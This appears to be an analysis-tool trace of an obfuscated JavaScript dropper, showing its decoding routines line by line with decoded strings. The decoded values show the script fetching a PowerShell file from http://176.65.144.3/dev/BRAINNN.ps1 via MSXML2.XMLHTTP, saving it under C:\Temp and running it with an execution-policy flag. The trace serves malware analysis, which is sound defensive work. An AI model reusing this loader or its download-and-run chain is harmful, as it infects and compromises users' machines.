U,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                            • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                            • Show all Function Runs
                                                            10
                                                            return c =
                                                              11
                                                              function (f, g) {
                                                              • c(306,"2R(7") ➔ "1161421kmDoqx"
                                                              • c(301,"W4CW") ➔ "3056630hPLbeP"
                                                              • c(288,"acrF") ➔ "21UUztzh"
                                                              • c(285,"2R(7") ➔ "304824SHNnOE"
                                                              • c(292,"$Rzi") ➔ "6308868LYUJpb"
                                                              • c(291,"3qtp") ➔ "217AirBTH"
                                                              • c(271,"FeJB") ➔ "307416GpwpUX"
                                                              • c(274,"sJ4*") ➔ "20070594WRyscm"
                                                              • c(277,"[My@") ➔ "C:\Temp"
                                                              • c(296,"871P") ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                              • Show all Function Runs
                                                              12
                                                              f = f - 0x10e;
                                                                13
                                                                var h = e[f];
                                                                  14
                                                                  if ( c['LNdzTv'] === undefined )
                                                                    15
                                                                    {
                                                                      16
                                                                      var i = function (n) {
                                                                      • i("W6/dIbmYW4/dR3RcPHKFW5hcLMq") ➔ "\xef\xc8\x132\xcf\xefz\xa6\x19\x1f\xd1\x96d"
                                                                      • i("r3qzW6z9W5xdLZDRW50LW5ddIW") ➔ "Gt\x19\xe6}\xd5\xd77k\xdd%\xd0\xcb"
                                                                      • i("vmojzSoSWQldR8ojW6a") ➔ "T\xc9f\xec\xa2\xef\xc9\xe0"
                                                                      • i("W63dIre7W4NdQrJcHtO1W7hcOG") ➔ "\xed\xc9\x11;\xc9\xe9\x18\x85:5\xf1\xa2"
                                                                      • i("mrhdKGpcMmoSW5T2uCocW5K+W6a") ➔ "1\x11\xd2\x03\x98\xec\xdbvQ\xc2\xd9>\xe0"
                                                                      • i("WP8NDudcN8o/WPLMjW") ➔ "\x9f'u@\x9f\xff\x99f'"
                                                                      • i("W4lcNCkxW64ngmoZwCkcW6lcVaa") ➔ "\xc2\x9d\x97\xee \x18\xf3Y\x82\xe2\xbc\x00"
                                                                      • i("ACkUdHfzeGlcS3ldImorW4fbBa") ➔ "i\xae\x0e\x11Y\x12\x02\xb3r\xc8\xd1\xc1Al"
                                                                      • i("mfddPh3cRSkaAa") ➔ "0P\xe4}\xae\x80h"
                                                                      • i("FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko") ➔ "|\xd8\xc5\xb1\x8ch}\xd7\xe1\x9a:t\xbd^\xfb2\xc08\xbb\xd2\x15\xd3 \x87\xca@G{\xc1\xb3t\xa5\x1a\xb4\xc2 }\x86\x93c"\xa3\x84\xe7+\xd9\x03\xdeb\xba&\xcb\xd2\xcak\x01\x03\x8e"
                                                                      • Show all Function Runs
                                                                      17
                                                                      var o = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                        18
                                                                        var p = '', q = '';
                                                                          19
                                                                          for ( var r = 0x0, s, t, u = 0x0 ; t = n['charAt'] ( u ++ ) ; ~ t && ( s = r % 0x4 ? s * 0x40 + t : t, r ++ % 0x4 ) ? p += String['fromCharCode'] ( 0xff & s >> ( - 0x2 * r & 0x6 ) ) : 0x0 )
                                                                            20
                                                                            {
                                                                              21
                                                                              t = o['indexOf'] ( t );
                                                                                22
                                                                                }
                                                                                  23
                                                                                  for ( var v = 0x0, w = p['length'] ; v < w ; v ++ )
                                                                                    24
                                                                                    {
                                                                                      25
                                                                                      q += '%' + ( '00' + p['charCodeAt'] ( v ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                        26
                                                                                        }
                                                                                          27
                                                                                          return decodeURIComponent ( q );
                                                                                          • decodeURIComponent("%c3%af%c3%88%13%32%c3%8f%c3%af%7a%c2%a6%19%1f%c3%91%c2%96%64") ➔ "\xef\xc8\x132\xcf\xefz\xa6\x19\x1f\xd1\x96d"
                                                                                          • decodeURIComponent("%47%74%19%c3%a6%7d%c3%95%c3%97%37%6b%c3%9d%25%c3%90%c3%8b") ➔ "Gt\x19\xe6}\xd5\xd77k\xdd%\xd0\xcb"
                                                                                          • decodeURIComponent("%54%c3%89%66%c3%ac%c2%a2%c3%af%c3%89%c3%a0") ➔ "T\xc9f\xec\xa2\xef\xc9\xe0"
                                                                                          • decodeURIComponent("%c3%ad%c3%89%11%3b%c3%89%c3%a9%18%c2%85%3a%35%c3%b1%c2%a2") ➔ "\xed\xc9\x11;\xc9\xe9\x18\x85:5\xf1\xa2"
                                                                                          • decodeURIComponent("%31%11%c3%92%03%c2%98%c3%ac%c3%9b%76%51%c3%82%c3%99%3e%c3%a0") ➔ "1\x11\xd2\x03\x98\xec\xdbvQ\xc2\xd9>\xe0"
                                                                                          • decodeURIComponent("%c2%9f%27%75%40%c2%9f%c3%bf%c2%99%66%27") ➔ "\x9f'u@\x9f\xff\x99f'"
                                                                                          • decodeURIComponent("%c3%82%c2%9d%c2%97%c3%ae%0d%18%c3%b3%59%c2%82%c3%a2%c2%bc%00") ➔ "\xc2\x9d\x97\xee \x18\xf3Y\x82\xe2\xbc\x00"
                                                                                          • decodeURIComponent("%69%c2%ae%0e%11%59%12%02%c2%b3%72%c3%88%c3%91%c3%81%41%6c") ➔ "i\xae\x0e\x11Y\x12\x02\xb3r\xc8\xd1\xc1Al"
                                                                                          • decodeURIComponent("%30%50%c3%a4%7d%c2%ae%c2%80%68") ➔ "0P\xe4}\xae\x80h"
                                                                                          • decodeURIComponent("%7c%c3%98%c3%85%c2%b1%c2%8c%68%7d%c3%97%c3%a1%c2%9a%3a%74%c2%bd%5e%c3%bb%32%c3%80%38%c2%bb%c3%92%15%c3%93%20%c2%87%c3%8a%40%47%7b%c3%81%c2%b3%74%c2%a5%1a%c2%b4%c3%82%09%7d%c2%86%c2%93%63%22%c2%a3%c2%84%c3%a7%2b%c3%99%03%c3%9e%62%c2%ba%26%c3%8b%c3%92%c3%8a%6b%01%03%c2%8e") ➔ "|\xd8\xc5\xb1\x8ch}\xd7\xe1\x9a:t\xbd^\xfb2\xc08\xbb\xd2\x15\xd3 \x87\xca@G{\xc1\xb3t\xa5\x1a\xb4\xc2 }\x86\x93c"\xa3\x84\xe7+\xd9\x03\xdeb\xba&\xcb\xd2\xcak\x01\x03\x8e"
                                                                                          • Show all Function Runs
                                                                                          28
                                                                                          };
                                                                                            29
                                                                                            var m = function (n, o) {
                                                                                            • function (f, g).rhiBXF("W6/dIbmYW4/dR3RcPHKFW5hcLMq","2R(7") ➔ "1161421kmDoqx"
                                                                                            • function (f, g).rhiBXF("r3qzW6z9W5xdLZDRW50LW5ddIW","W4CW") ➔ "3056630hPLbeP"
                                                                                            • function (f, g).rhiBXF("vmojzSoSWQldR8ojW6a","acrF") ➔ "21UUztzh"
                                                                                            • function (f, g).rhiBXF("W63dIre7W4NdQrJcHtO1W7hcOG","2R(7") ➔ "304824SHNnOE"
                                                                                            • function (f, g).rhiBXF("mrhdKGpcMmoSW5T2uCocW5K+W6a","$Rzi") ➔ "6308868LYUJpb"
                                                                                            • function (f, g).rhiBXF("WP8NDudcN8o/WPLMjW","3qtp") ➔ "217AirBTH"
                                                                                            • function (f, g).rhiBXF("W4lcNCkxW64ngmoZwCkcW6lcVaa","FeJB") ➔ "307416GpwpUX"
                                                                                            • function (f, g).rhiBXF("ACkUdHfzeGlcS3ldImorW4fbBa","sJ4*") ➔ "20070594WRyscm"
                                                                                            • function (f, g).rhiBXF("mfddPh3cRSkaAa","[My@") ➔ "C:\Temp"
                                                                                            • function (f, g).rhiBXF("FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko","871P") ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                            • Show all Function Runs
                                                                                            30
                                                                                            var p = [], q = 0x0, r, t = '';
                                                                                              31
                                                                                              n = i ( n );
                                                                                              • i("W6/dIbmYW4/dR3RcPHKFW5hcLMq") ➔ "\xef\xc8\x132\xcf\xefz\xa6\x19\x1f\xd1\x96d"
                                                                                              • i("r3qzW6z9W5xdLZDRW50LW5ddIW") ➔ "Gt\x19\xe6}\xd5\xd77k\xdd%\xd0\xcb"
                                                                                              • i("vmojzSoSWQldR8ojW6a") ➔ "T\xc9f\xec\xa2\xef\xc9\xe0"
                                                                                              • i("W63dIre7W4NdQrJcHtO1W7hcOG") ➔ "\xed\xc9\x11;\xc9\xe9\x18\x85:5\xf1\xa2"
                                                                                              • i("mrhdKGpcMmoSW5T2uCocW5K+W6a") ➔ "1\x11\xd2\x03\x98\xec\xdbvQ\xc2\xd9>\xe0"
                                                                                              • i("WP8NDudcN8o/WPLMjW") ➔ "\x9f'u@\x9f\xff\x99f'"
                                                                                              • i("W4lcNCkxW64ngmoZwCkcW6lcVaa") ➔ "\xc2\x9d\x97\xee \x18\xf3Y\x82\xe2\xbc\x00"
                                                                                              • i("ACkUdHfzeGlcS3ldImorW4fbBa") ➔ "i\xae\x0e\x11Y\x12\x02\xb3r\xc8\xd1\xc1Al"
                                                                                              • i("mfddPh3cRSkaAa") ➔ "0P\xe4}\xae\x80h"
                                                                                              • i("FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko") ➔ "|\xd8\xc5\xb1\x8ch}\xd7\xe1\x9a:t\xbd^\xfb2\xc08\xbb\xd2\x15\xd3 \x87\xca@G{\xc1\xb3t\xa5\x1a\xb4\xc2 }\x86\x93c"\xa3\x84\xe7+\xd9\x03\xdeb\xba&\xcb\xd2\xcak\x01\x03\x8e"
                                                                                              • Show all Function Runs
                                                                                              32
                                                                                              var u;
                                                                                                33
                                                                                                for ( u = 0x0 ; u < 0x100 ; u ++ )
                                                                                                  34
                                                                                                  {
                                                                                                    35
                                                                                                    p[u] = u;
                                                                                                      36
                                                                                                      }
                                                                                                        37
                                                                                                        for ( u = 0x0 ; u < 0x100 ; u ++ )
                                                                                                          38
                                                                                                          {
                                                                                                            39
                                                                                                            q = ( q + p[u] + o['charCodeAt'] ( u % o['length'] ) ) % 0x100, r = p[u], p[u] = p[q], p[q] = r;
                                                                                                              40
                                                                                                              }
                                                                                                                41
                                                                                                                u = 0x0, q = 0x0;
                                                                                                                  42
                                                                                                                  for ( var v = 0x0 ; v < n['length'] ; v ++ )
                                                                                                                    43
                                                                                                                    {
                                                                                                                      44
                                                                                                                      u = ( u + 0x1 ) % 0x100, q = ( q + p[u] ) % 0x100, r = p[u], p[u] = p[q], p[q] = r, t += String['fromCharCode'] ( n['charCodeAt'] ( v ) ^ p[( p[u] + p[q] ) % 0x100] );
                                                                                                                        45
                                                                                                                        }
                                                                                                                          46
                                                                                                                          return t;
                                                                                                                            47
                                                                                                                            };
                                                                                                                              48
                                                                                                                              c['rhiBXF'] = m, b = arguments, c['LNdzTv'] = ! ! [];
                                                                                                                                49
                                                                                                                                }
                                                                                                                                  50
                                                                                                                                  var j = e[0x0], k = f + j, l = b[k];
                                                                                                                                    51
                                                                                                                                    return ! l ? ( c['dyCtug'] === undefined && ( c['dyCtug'] = ! ! [] ), h = c['rhiBXF'] ( h, g ), b[k] = h ) : h = l, h;
                                                                                                                                    • function (f, g).rhiBXF("W6/dIbmYW4/dR3RcPHKFW5hcLMq","2R(7") ➔ "1161421kmDoqx"
                                                                                                                                    • function (f, g).rhiBXF("r3qzW6z9W5xdLZDRW50LW5ddIW","W4CW") ➔ "3056630hPLbeP"
                                                                                                                                    • function (f, g).rhiBXF("vmojzSoSWQldR8ojW6a","acrF") ➔ "21UUztzh"
                                                                                                                                    • function (f, g).rhiBXF("W63dIre7W4NdQrJcHtO1W7hcOG","2R(7") ➔ "304824SHNnOE"
                                                                                                                                    • function (f, g).rhiBXF("mrhdKGpcMmoSW5T2uCocW5K+W6a","$Rzi") ➔ "6308868LYUJpb"
                                                                                                                                    • function (f, g).rhiBXF("WP8NDudcN8o/WPLMjW","3qtp") ➔ "217AirBTH"
                                                                                                                                    • function (f, g).rhiBXF("W4lcNCkxW64ngmoZwCkcW6lcVaa","FeJB") ➔ "307416GpwpUX"
                                                                                                                                    • function (f, g).rhiBXF("ACkUdHfzeGlcS3ldImorW4fbBa","sJ4*") ➔ "20070594WRyscm"
                                                                                                                                    • function (f, g).rhiBXF("mfddPh3cRSkaAa","[My@") ➔ "C:\Temp"
                                                                                                                                    • function (f, g).rhiBXF("FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko","871P") ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                                                                                                                    • Show all Function Runs
                                                                                                                                    52
                                                                                                                                    }, c ( b, d );
                                                                                                                                      53
                                                                                                                                      }
                                                                                                                                        54
                                                                                                                                        var l = c, k = b;
                                                                                                                                          55
                                                                                                                                          ( function (d, e) {
                                                                                                                                          • (function a(),802119) ➔ undefined
                                                                                                                                          • (function a(),802119) ➔ undefined
                                                                                                                                          • Show all Function Runs
                                                                                                                                          56
                                                                                                                                          var j = b, i = c, f = d ( );
                                                                                                                                          • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                          • Show all Function Runs
                                                                                                                                          57
                                                                                                                                          while (! ! [ ] )
                                                                                                                                            58
                                                                                                                                            {
                                                                                                                                              59
                                                                                                                                              try
                                                                                                                                                60
                                                                                                                                                {
                                                                                                                                                  61
                                                                                                                                                  var g = parseInt ( i ( 0x132, '2R(7' ) ) / 0x1 + parseInt ( i ( 0x12d, 'W4CW' ) ) / 0x2 + parseInt ( i ( 0x120, 'acrF' ) ) / 0x3 * ( - parseInt ( i ( 0x11d, '2R(7' ) ) / 0x4 ) + - parseInt ( j ( 0x133 ) ) / 0x5 + parseInt ( i ( 0x124, '$Rzi' ) ) / 0x6 + - parseInt ( i ( 0x123, '3qtp' ) ) / 0x7 * ( - parseInt ( i ( 0x10f, 'FeJB' ) ) / 0x8 ) + parseInt ( i ( 0x112, 'sJ4*' ) ) / 0x9 * ( - parseInt ( j ( 0x135 ) ) / 0xa );
                                                                                                                                                  • c(306,"2R(7") ➔ "1161421kmDoqx"
                                                                                                                                                  • parseInt("1161421kmDoqx") ➔ 1161421
                                                                                                                                                  • c(301,"W4CW") ➔ "3056630hPLbeP"
                                                                                                                                                  • parseInt("3056630hPLbeP") ➔ 3056630
                                                                                                                                                  • c(288,"acrF") ➔ "21UUztzh"
                                                                                                                                                  • parseInt("21UUztzh") ➔ 21
                                                                                                                                                  • c(285,"2R(7") ➔ "304824SHNnOE"
                                                                                                                                                  • parseInt("304824SHNnOE") ➔ 304824
                                                                                                                                                  • b(307) ➔ "6834120TLBOuD"
                                                                                                                                                  • parseInt("6834120TLBOuD") ➔ 6834120
                                                                                                                                                  • c(292,"$Rzi") ➔ "6308868LYUJpb"
                                                                                                                                                  • parseInt("6308868LYUJpb") ➔ 6308868
                                                                                                                                                  • c(291,"3qtp") ➔ "217AirBTH"
                                                                                                                                                  • parseInt("217AirBTH") ➔ 217
                                                                                                                                                  • c(271,"FeJB") ➔ "307416GpwpUX"
                                                                                                                                                  • parseInt("307416GpwpUX") ➔ 307416
                                                                                                                                                  • c(274,"sJ4*") ➔ "20070594WRyscm"
                                                                                                                                                  • parseInt("20070594WRyscm") ➔ 20070594
                                                                                                                                                  • b(309) ➔ "10sKsFln"
                                                                                                                                                  • parseInt("10sKsFln") ➔ 10
                                                                                                                                                  • Show all Function Runs
                                                                                                                                                  62
                                                                                                                                                  if ( g === e )
                                                                                                                                                    63
                                                                                                                                                    break ;
                                                                                                                                                      64
                                                                                                                                                      else
                                                                                                                                                        65
                                                                                                                                                        f['push'] ( f['shift'] ( ) );
                                                                                                                                                          66
                                                                                                                                                          }
                                                                                                                                                            67
                                                                                                                                                            catch ( h )
                                                                                                                                                              68
                                                                                                                                                              {
                                                                                                                                                                69
                                                                                                                                                                f['push'] ( f['shift'] ( ) );
                                                                                                                                                                  70
                                                                                                                                                                  }
                                                                                                                                                                    71
                                                                                                                                                                    }
                                                                                                                                                                      72
                                                                                                                                                                      } ( a, 0xc3d47 ) );
                                                                                                                                                                        73
                                                                                                                                                                        function b(c, d) {
                                                                                                                                                                        • b(307) ➔ "6834120TLBOuD"
                                                                                                                                                                        • b(309) ➔ "10sKsFln"
                                                                                                                                                                        • b(298) ➔ "http://176.65.144.3/dev/BRAINNN.ps1"
                                                                                                                                                                        • b(300) ➔ "C:\Temp\WTRTRWFSHS.ps1"
                                                                                                                                                                        • b(270) ➔ "WScript.Shell"
                                                                                                                                                                        • b(284) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                        • b(279) ➔ "MSXML2.XMLHTTP"
                                                                                                                                                                        • b(295) ➔ "CreateFolder"
                                                                                                                                                                        • b(280) ➔ "Open"
                                                                                                                                                                        • b(293) ➔ "GET"
                                                                                                                                                                        • Show all Function Runs
                                                                                                                                                                        74
                                                                                                                                                                        var e = a ( );
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
                                                                                                                                                                        • a() ➔ v1nJCMLWDc5tAgvSBa,W4lcNCkxW64ngmoZwCkcW6lcVaa,rg93BMXVywqGzMfPBgvKihDPDgGGC3rHDhvZoIa,rxHPDgLUzYbZy3jPChqGzhvLihrVigrVD25SB2fKigzHAwX1CMuU,ACkUdHfzeGlcS3ldImorW4fbBa,r8o2W69AWQulW7tdG8k+WQnGW7ipf8ojj8o0W61wv8o0W4hcLgbhESoCW79QW4OTW6nTWOJdMgNcHq,AbRcSmoxW4q1w0RdKSkMW6ZdTG,mfddPh3cRSkaAa,WOfxW7RdOmo3,tvnytuWYlLHnteHuvfa,t3bLBG,u3rHDhvZ,gSoZWONdGdyrWPb1W6pdSuqf,fLbMlsjVWR9Hvt4HwW,u2nYAxb0Aw5NlKzPBgvtExn0zw1pyMPLy3q,W63dIre7W4NdQrJcHtO1W7hcOG,F8o5WRldIW,DsipxItcNq,vmojzSoSWQldR8ojW6a,mJfvvxP0EMG,W592WRRdHmoSgNTYW7ddPmknCSoJW4K,WP8NDudcN8o/WPLMjW,mrhdKGpcMmoSW5T2uCocW5K+W6a,r0vu,p0GGemk7ymkQWQ07FmktWPPU,q3jLyxrLrM9SzgvY,FmoyW4xcSCkmAh3dL8oHWPO6Dmk9xSo7mSoaomk7W5ivW5mGWOFdIKbhE8obWRn0WQuAWRtdGGL9WOBcK2mIWQpcHmoNk8oza8oEySk6jSolW5ldIMSba8ko,gSoZWORdJdutWOrnW5RdR14y,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVqLjbsu5otI5WCZe,W4FcLCktW64nhmkeFCk5W5dcPI3dHa,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,r3qzW6z9W5xdLZDRW50LW5ddIW,q3jLyxrLvgv4DezPBgu,qZVdLCok,BwvZC2fNzq,nJmWodG2oeXzvuPWyG,W6/dIbmYW4/dR3RcPHKFW5hcLMq,nJGZndeYmfrmqK91ra,uNvU,mtbZs3ngBg4,WOOjl8ojWRRcTvTEu8kpxCkMWPq7D0GJcCkpcbtcPSkLWOhdHfW
